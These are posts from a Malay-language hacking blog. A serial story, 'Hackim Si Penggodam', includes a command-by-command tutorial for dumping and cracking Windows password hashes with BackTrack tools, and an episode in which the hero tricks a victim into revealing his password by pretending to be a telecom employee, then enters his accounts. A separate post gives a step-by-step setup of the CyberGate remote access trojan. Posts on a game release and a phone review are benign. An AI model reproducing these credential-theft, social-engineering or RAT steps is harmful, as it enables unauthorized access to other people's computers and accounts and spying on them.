Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KESEPULUH

Dalam menjalankan misinya itu. Hackim juga mempertingkatkan pengetahuannya dalam dunia hacking ini. Pada satu malam, semasa dia sedang cari tutorial hacking, dia ada terjumpa satu tutorial iaitu How To Hack Windows 7 Password. Melihat kepada tajuknya sahaja sudah menarik perhatian dia. Jadi dia pun cubalah mempraktikkan tutorial tersebut terhadap komputernya. Dan apa yang diperlukan hanyalah BackTrack 5. Di bawah ini adalah tutorialnya :Pertama sekali buka BackTrack 5 anda. Kemudian buka terminal dan taipkan :

root@bt:~# fdisk -l


Kemudian taipkan perintah ini pula :

root@bt:~# mkdir /mnt/win
root@bt:~# mount /dev/sda2 /mnt/win


Mengikut kepada laptop saya, /dev/sda2 adalah partition yang mempunyai fail Windows. Atau dengan kata lainnya Local Disk C. Jadi anda punya mungkin /dev/sda1 atau pun lain. Anda kena pandai cari sendiri la.

Dah siap pilih? Okay kita akan change direction ke fail config dan kita list kesemua fail yang terdapat dalamnya.

root@bt:~# cd /mnt/win/Windows/System32/config
root@bt:/mnt/win/Windows/System32/config# ls


Setelah list kesemua fail, cuba cari fail SYSTEM. Jika ada, kita terus pula ke perintah ini.

root@bt:/mnt/win/Windows/System32/config# bkhive SYSTEM ~/Desktop/key


Apa itu bkhive? Anda boleh rujuk di sini.

Kemudian taipkan pula perintah ini :

root@bt:/mnt/win/Windows/System32/config# samdump2 SAM ~/Desktop/key > ~/Desktop/hash


Apa itu samdump2? Anda boleh rujuk di sini.

Dah siap semua tu, taipkan perintah ini untuk melihat isi dalam fail "hash" tersebut. Lihat contoh di bawah :

root@bt:/mnt/win/Windows/System32/config# cat ~/Desktop/hash
Administrator:500:aad3d425b53404eeaad3b435b51404ee:
32d6cfe0d46ae931b63c54d7a0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:
31d6cfe0a16ae931b73c59d7e0s089c0:::
AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:
41e3de21585311b3e34410f3a27a7e5d:::


Mengikut kepada apa yang anda lihat di atas, "AdminPass" adalah admin yang mengandungi password yang kita cari. Jadi hari ni kita gunakan "hashcat" untuk pecahkan password AdminPass.

Jadi anda kena pergi ke direktori yang ada hashcat dengan taipkan perintah ini :

root@bt:/mnt/win/Windows/System32/config# cd /pentest/passwords/hashcat


Kemudian kita ambil bahagian "AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:41e3de21585311b3e34410f3a27a7e5d:::" dari fail hash dan alihkan ke fail baru iaitu singlehash dengan menaipkan perintah ini :

root@bt:/pentest/passwords/hashcat# grep AdminPass ~/Desktop/hash > ~/Desktop/singlehash


Kita ke langkah seterusnya pula iaitu edit sedikit dalam fail singlehash itu. Anda hanya perlu taipkan perintah ini dulu :

root@bt:/pentest/passwords/hashcat# vi ~/Desktop/singlehash


Kemudian tekan huruf A pada keyboard anda untuk edit. Anda padamkan semua karakter yang berwarna kuning itu. Dan ianya akan jadi seperti gambar di bawah.

AdminPass:1000:aad3b435b51404eeaad3b435b51404ee:
41e3de21585311b3e34410f3a27a7e5d:::


Jadi seperti ini :

41e3de21585311b3e34410f3a27a7e5d


Okay dah siap? Kemudian tekan Ctrl+C dan taipkan karakter ini ":wq" tanpa quote dan tekan Enter. Seterusnya taipkan pula perintah ini :

root@bt:/pentest/passwords/hashcat# ./hashcat-cli32.bin --attack-mode=3 --hash-mode=1000 ~/Desktop/singlehash


Taipkan YES selepas itu dan siap! Anda hanya perlu tunggu sahaja sehingga password itu dipecahkan. Jika tidak berjaya, anda boleh edit hashcat supaya boleh berjaya. =)

Itulah tutorial yang telah dipelajari oleh Hackim. Dan dia telah berjaya pecahkan password komputernya yang menggunakan Windows 7. Ilmunya mengenai hacking sudah bertambah sedikit.

"Yeah! Aku berjaya pecahkan password ini. Aku nak mendalami lagilah pasal BackTrack ni. Banyak benda aku boleh buat."


Itulah antara ilmu hacking yang dipelajari oleh Hackim. Walaupun nampak sukar bagi pemula, andai ada kemahuan, pasti akan ada jalan penyelesaian. Tunggu untuk episod seterusnya!

p/s : Sila baca entri ini untuk menambahkan ilmu atau refresh balik ilmu anda itu. ^^

Hack Windows Administrator Password : PC Login Now
Tools Untuk Hack Windows Administrator Password
Ophcrack Live CD : Hack Windows Administrator Password

Hackim Si Penggodam :
Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)
Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)

Sekian.

Permainan RTS 0 A.D. Alpha 10 Jhelum Dirilis


Bagi peminat permainan RTS seperti saya, rilisan ini adalah yang sangat ditunggu-tunggu. Bulan April yang lalu, permainan 0 A.D Alpha 9 Ides of March, memasuki Ubuntu Software Center dalam Ubuntu 12.04. Kini versi Alpha 10 yang diberi kod nama Jhelum dilepaskan kepada para pemain.


Anda boleh membaca nota rilis untuk versi Alpha 10 di sini : Wildfire Games : New Release: 0 A.D. Alpha 10 Jhelum

Untuk memasang versi terbaru ini pada Ubuntu 12.04, 11.10, 11.04, 10.10 dan 10.04, anda boleh pasangkannya menggunakan PPA:

sudo add-apt-repository ppa:wfg/0ad
sudo apt-get update 
sudo apt-get install 0ad

Untuk pemasangan pada Windows, Linux [distro selain Ubuntu], dan Mac OS X, anda boleh rujuk pada pautan berikut:

Instruction for Windows

Instruction for Linux

Instruction for Mac OS X

Berikut dipaparkan video mengenai permainan 0 A.D. Alpha 10 Jhelum:


16 May 2012

Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KESEMBILAN

Setelah memikirkan bagaimana untuk mengetahui password ZestCool ni. Tiba-tiba Hackim teringat akan filem yang pernah ditontonnya pada masa dulu iaitu Hacker 2 : Operation Takedown. Dalam filem itu Kevin Mitnick hanya menggunakan telefon untuk mendapatkan maklumat yang dia mahukan.

"Laa. Kenapa aku tak fikir cara ni awal-awal. Dah nama pun social engineeringkan. Okay sekarang ni aku cuba gunakan maklumat yang ada ni untuk berbual dengan dia dan dapatkan password dia."


Pada malam itu juga Hackim mencari sedikit maklumat supaya perbualan antara dia dengan ZestCool berjalan dengan lancar.

"Mengikut kepada maklumat yang ada, kemungkinan besar ZestCool ni ada ilmu hacking sebab dia suka layari laman web hacking seperti Omg!Hackers?. Jadi aku kenalah menyamar menjadi orang yang dia akan percaya 100%. Emm. Ha! Aku rasa aku tahu. Walaupun teknik ni agak mudah di kesan tapi apa salahnya mencuba. Heee."


Hackim pun mengambil telefon miliknya dan salin nombor ZestCool di atas kertas kemudian dia terus pergi ke telefon awam berdekatan rumahnya untuk menjalankan misinya itu. Setelah sampai dia pun masuk beberapa duit syiling dalam telefon awam tu dan mendail nombor ZestCool.Ini adalah perbualan mereka :

Hackim : Hello. Boleh saya bercakap dengan ZestCool.

ZestCool : Ya. Saya di sini.

Hackim : Saya daripada Syarikat Telekomunikasi Sdn.Bhd. Nama saya Encik Luqman. Kami mendapati bahawa Facebook anda telah digunakan oleh pihak tertentu untuk menyebarkan virus yang merbahaya kepada pengguna Facebook yang lain.

ZestCool : Haha. Kau buat lawak apa ni. Aku punya Facebook tak boleh di godam la. Password aku security habis okay? Jadi janganlah nak memperbodohkan aku.

Hackim : Minta maaf. Kami tidak memperbodohkan anda. Kami cakap berdasarkan informasi yang kami dapat. Mengikut kepada informasi yang kami dapat, anda telah membuka satu aplikasi yang berkaitan dengan kereta dan nama aplikasi tersebut HackerCar, aplikasi tersebut sebenarnya telah direka oleh pihak ketiga untuk mendapatkan maklumat pengguna yang menggunakan aplikasi tersebut. Dan anda adalah salah seorang dari mereka yang menggunakan aplikasi tersebut. Virus ini akan menyebarkan gambar-gambar yang tidak sopan untuk di lihat kepada rakan-rakan facebook anda. Di dalam gambar tersebut jika ianya di tekan, ianya akan membawa anda ke satu laman web di mana ianya mengandungi pelbagai virus. Dan seterusnya akan merosakkan komputer pemiliknya. Virus yang mereka buat ini adalah fully undetectable. Jadi sukar untuk di kesan oleh antivirus. Kami harap anda dapat menutup akaun facebook anda sekarang juga buat sementara waktu.

ZestCool : Ya ke? Saya sekarang ni tidak dapat membuka akaun facebook saya kerana internet dirumah saya dipotong kerana tidak dibayar. Jadi bagaimana sekarang?

Hackim seperti tidak mempercayai bahawa peluangnya kini terbuka luas.

Hackim : Oh begitu ya. Baiklah mengikut kepada maklumat yang saya ada, email anda adalah zestcool@hacker.com. Jadi saya akan menggunakan email anda ini untuk masuk ke akaun anda dan menutup akaun anda. Adakah betul email anda ini?

ZestCool : Ya betul itu email saya. Bagaimana dengan password?

Hackim : Jangan risau. Passowrd juga kami ada iaitu zestcool96. Adakah betul itu password anda?

ZestCool : Eh salah tu. Itu password lama saya. Saya punya password ialah 0mgh@ckers. Cepat tutup saya punya akaun, saya takut nanti virus tu merebak ke facebook cikgu saya. Sebab cikgu saya antara rakan di facebook saya. Habis saya nanti!

Hackim : Jangan risau. Akaun anda akan kami tutup sekarang juga. Terima kasih kerana memberikan kerjasama. Jika ada sebarang pertanyaan, anda boleh telefon kami di 0123456789.

ZestCool : Baiklah. Terima kasih kerana memberitahu saya akan perkara ini. Saya amat menghargainya.


Hackim pun terus meletakkan ganggang telefon dan berkata "Yes!". Dia tak sangka begitu senang rupanya untuk dapatkan maklumat yang dia mahukan melalui teknik social engineering ini. Dia pun balik ke rumahnya dan masuk ke akaun Facebook ZestCool dengan menggunakan password yang diberikan tadi, dan berjaya! Itulah kali pertama dia masuk ke akaun facebook orang lain. Rasa kepuasan teramat apabila berjaya melakukannya. Kemudian dia pun terfikir untuk masuk ke akaun lain dengan menggunakan password yang sama. Tetapi tidak berjaya. Dia pun mencuba password yang ditekanya secara spontan tadi iaitu zestcool96, dan berjaya masuk ke salah satu akaunnya iaitu www.hacker.com. Dia pun terkejut!

"Wow! Tak sangka aku berjaya masuk lagi satu akaun. Akaun email dia pula tu! Aku boleh buat apa saja yang aku mahu kalau aku ni budak jahat. Tapi tak apa lah. Nanti Encik Ariff tahu aku buat benda jahat, habis aku"


Dia pun log out kedua-dua akaun yang dibuka itu. Kini dia dah ada sedikit pengalaman dalam melakukan social engineering ini. Perasaannya membuak-buak untuk membuat social engineering tu sekali lagi. Dia seperti rasa tidak puas. Kemudian dia pun terfikir untuk social engineering kat Bluedragon pula. Tapi kena tunggu peluang je la.

"Aku kena tau sekurang-kurangnya email dia. Kemudian kena tahu apa website yang selalu dia buka. Lepas tu baru boleh social engineering dia. Lagipun no telefon dia aku ada. So kira senang sikit la kerja aku."


Jadi kita tunggu je lah apa yang akan di buat oleh Hackim ini. ZestCool sudah "kena". Adakah Bluedragon akan ter"kena" seperti ZestCool juga? Sama-sama kita tunggu.

p/s : Maaf da lama tak update entri. Sibuk sedikit kebelakangan ini sebab prepare untuk menjadi student di ipta selepas ini. Hehe. Kos apa? Dirahsiakan. Di mana? Pun dirahsiakan. Hahaha.

Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)

Sekian.

HTC One X [Beats Audio] Quick Review


Salam.

Maaf kerana lama tidak menulis. Sekarang sedang sibuk dengan kerja, dan tak lupa juga ada projek 'kecil-kecilan' untuk membuat radio dalam talian sendiri. Penangan Dragons of Atlantis juga memainkan peranan! Biasalah, dah tua-tua begini baru kenal dengan permainan video! Haha!

Sebelum anda membaca reviu saya mengenai teknologi Beats Audio yang telah dirasai melalui super smartphone HTC One X, anda boleh membaca reviu penuh mengenai smartphone ini di The Techblock.


Spesikasi HTC One X (Highlight):
  • 1.5 GHz Quad-Core Nvidia Tegra 3 Processor
  • 1 GB Ram
  • 4.7” Super LCD2 Touch Screen with 720p HD resolution
  • Gorilla Glass 2
  • Built in 32 GB storage
  • 8MP Camera with 1080p HD video recording
  • 1.3 MP Front Camera
  • 1800 mAH battery
  • NFC
Spesikasi penuh : GSM Arena


Siapa Dr.Dre?
Merujuk kepada laman Wikipedia, Dr.Dre atau nama sebenarnya Andre Romelle Young, adalah seorang penyanyi (rap) dari Amerika, dan merupakan seorang penerbit serta eksekutif rakaman, ahli perniagaan dan pelakon.
Apa Itu Beats Audio?
Beats Audio ringkasnya adalah teknologi peningkat audio yang telah diasas dan dipelopori oleh Dr.Dre. Teknologi ini membantu para pendengar khususnya peminat muzik untuk mendengar muzik dengan lebih baik dari teknologi yang lain.
Ok. Cukup setakat itu untuk intro mengenai Beats Audio. Seperti yang anda ketahui, saya adalah bekas pemuzik (underground) dan sangat meminati dalam bidang ini. Jadi apabila ingin membeli gadget, apa yang dicari adalah kepuasan dalam mendengar muzik. Jadi malam semalam saya tekadkan hati untuk membeli HTC One X yang dilengkapi dengan teknologi Beats Audio ini, beserta dengan In-ear headphones with Beats Audio by Dr.Dre.

Secara keseluruhannya, ini adalah gadget yang saya amat berpuas hati dari segi fungsi, kelajuan, dan juga ciri 'mesra pemuzik-nya'. Ia melengkapkan kehendak mereka yang gemarkan muzik, tidak kira apa genre sekalipun. Dengan pemproses Quad Core (4 Teras), prestasinya berada pada tahap kemuncak. Walaupun ada antara reviu yang 'tidak menyedapkan telinga' mengenai teknologi ini, tetapi kebanyakan dari mereka adalah penggemar gadget (biasa), dan bukan 'hardcore musician'. Jadi reviu dari mereka memang saya tidak pakai langsung!

Saya cuba mainkan beberapa muzik yang berbeza genre, dan ternyata Beats Audio 'menghidupkan' lagi 'feel' muzik itu. Dari genre pop, dance, hinggalah kepada brutal death metal seperti Cannibal Corpse, anda tidak akan puas mendengarnya. Mungkin jika saya tulis lebih lagi, ia akan kedengaran seperti terlebih dalam memuji. Jadi jika anda sama seperti saya, dan ada 'lebihan dana', saya sarankan HTC One X untuk diselitkan dalam poket anda. 5/5 bintang untuk smartphone canggih ini.

Setup Cybergate RAT "RAT yang terulung di dunia"


Assalamualaikum dan selamat sejahtera..

Dengar saja tentang RAT(tikus) semua orang kalut..

Sesetengah orang tidak tahu apa benda RAT..Kalau tidak tahu,sila baca dahulu untuk mendapatkan ilmu..Anda boleh rujuk di Sini..

Toturial ini dibuat oleh khairuddin25..Ini pesan beliau sebelum anda semua belajar "Sebelum memulakan tutorial kali ni, saya ada beberapa perkara yang perlu diingatkan. Saya cuma mahu kongsikan ilmu dan pengalaman yang ada pada saya sahaja. Jadi, segala kejadian yang berlaku disebabkan tutorial ini, saya tidak bertanggungjawab sama sekali ya...

Tidak kiralah, sama ada sistem komputer anda telah dijahanamkan, maklumat atau data anda dicuri, ataupun segala kerugian yang ditanggung oleh mangsa.Segala perbuatan yang berkaitan dengan zalim dan mengintip orang lain adalah satu dosa. Atas faktor inilah, hati saya agak berbelah bagi untuk berkongsi dengan orang lain"..Ini pesan beliau,harap guna lah toturial ini kepada kebaikan..

Ok,kita mula toturial sekarang..

Bahan yang perlu ada adalah:

1.Cybergate RAT Download:Cybergate..
2.DUC 3.0 (no-ip.com)       :DUC..

Step pertama:

1.Mulakan langkah dengan pergi  http://www.No-IP.com  dan Register...Kalau sudah ada akaun, log in jer...
2. Kemudian, klik "Add Host"

3. Seterusnya, tetapkan “host name” tuuu...


Hostname : Your Host Name, EG: Host Type: DNS Host (A)

Kemudian, klik jer "Create Host" kat bawah kanan tu...

Ok, host telah pun siap!!! Baru siap step pertama...
Kemudian, mari kita ke No-IP Client plak... Bereh blaka tu...


STEP KEDUA :

1. No-IP Client tu, download, extract ke dekstop, kemudian install...
2. Selepas install, buka, Log In dengan No-ip Username & Password anda...
3. Apabila Log In tu, klik "Select Hosts" kemudian Check That Little Box dengan Hostname anda tadi...


Nota: kena patikan No-IP tu dibuka apabila Cybergate dibuka! Bimbang tak menjadi kan...Dan kepada yang tengah connet VPN sila disconnect,sebab ia akan jadi macam gambar di bawah..

Ahh, tu diaaa!!!!
No-IP Host & No-IP Duc Is telah pun Set Up!!!


STEP KETIGA :
Kita mulakan Set Up CyberGates 2.3.0

Buka CyberGate.

Sekarang, tunggu 10 saat kemudian klik “I Agree”

Sekarang, taip password dan klik Remember Password. Lepas tu, login..Taip ja password yang anda nak..

Bila klik login, kamu akan lihat sepertimana gambar berikut...
Klik “Control Center” dan seterusnya dia akan paparkan...
Kemudian klik “Start” pada kotak Power...

Kemudian, buat macam ni plak...

1. Klik pada The port yang ada tertulis "999"..
2. Klik Delete..

1. Letakkan dalam “Port Number”..
2. Klik "Add"..
3. Isi password dalam kotak di antara kotak “Password” dan "Show Password"..
4. Taip Login Password anda..
5. Klik butang "Save" ..

Sekarang, klik console Server :


Sekarang, server anda berjaya dihasilkan..

PortFowarding [Sangat mudah!!!]

**Nota: kamu perlukan Bittorent, Utorrent dan sebagainya...

Buka enjin torrent tu, buka preferenced, klik connection, kemudian buat :

1. klik "Random Port " SEKALI!!!..
2. Taip port number dalam kotak tu sepertimana nombor port yang telah kita set kan tadi. ..
3. Pergi ke http://www.canyouseeme.org untuk chack jika port anda telah berjaya dibuka dengan sempurna... haha..
4.Random port dalam gambar tu salah..sila letak 100 dalam kotak random port tu..

BERJAYA!!!

Akhirnya siap juga..gunalah Rat ini ke jalan yang benar..Yang baik menjadi teladan yang buruk menjadi sempadan..

Credit to:khairuddin25..14 May 2012

Browser Forensic Tool v2.0 [Windows]


Browser Forensic Tool v2.0 telah dibangunkan oleh DarkCoderSc. Ia adalah sebuah alat yang dapat digunakan untuk mengimbas pelayar-pelayar web popular yang disokong iaitu Internet Explorer, Google Chrome, Mozilla FireFox, RockMelt, Comodo Dragon dan Opera.

Paparan Browser Forensic Tool v2.0 Dalam Ubuntu Menggunakan Wine

Alat/program ini berfungsi dengan mengimbas sejarah carian menggunakan profil yang diisi dengan kata kunci terpilih (yang dipilih oleh anda juga boleh dimasukkan). Bagi setiap kata kunci yang menyamai dengan hasil imbasan, URL kata kunci tersebut akan terpapar pada hasil imbasan alat ini.

Masih samar dengan kegunaannya? Lihat paparan video di bawah:
Berikut adalah ciri-ciri alat ini yang disalin secara terus dari laman pembangunnya (tanpa terjemahan):

Scan the most famous browser history very quickly (Google Chrome, Mozilla FireFox, Microsoft Internet Explorer, Opera, Comodo Dragon, RockMelt). 
Multithread technologie, you can do several actions at the same time without freezing the scanning process (also you can stop the scan). 
You are able to customize/ create/ modify your own profile keywords and scan the history by categories or all categories at the same time. 
Even archived history files are intelligently scanned, nothing is left. 
You can export/ import the result list in csv format then open it under Microsoft Excel or related software, or import to BFT using import function. 
At a glance you know what browser is the most concerned using the statistics at the end of the scan.

Alat ini pasti berguna untuk anda suatu hari nanti. Dengan ciri carian intensif, tidak mustahil banyak data sulit yang dapat anda 'gali' hasil dari imbasan Browser Forensic Tool. Namun harus diingatkan, setiap apa yang anda lakukan, berwaspadalah, dan kalau boleh jangan lakukan perkara yang melanggar undang-undang. Cyber Security ada dimana-mana, dan anda boleh diberkas jika melakukan kesalahan.

Muat turun Browser Forensic Tool v2.0 pada pautan ini : BFTv2.0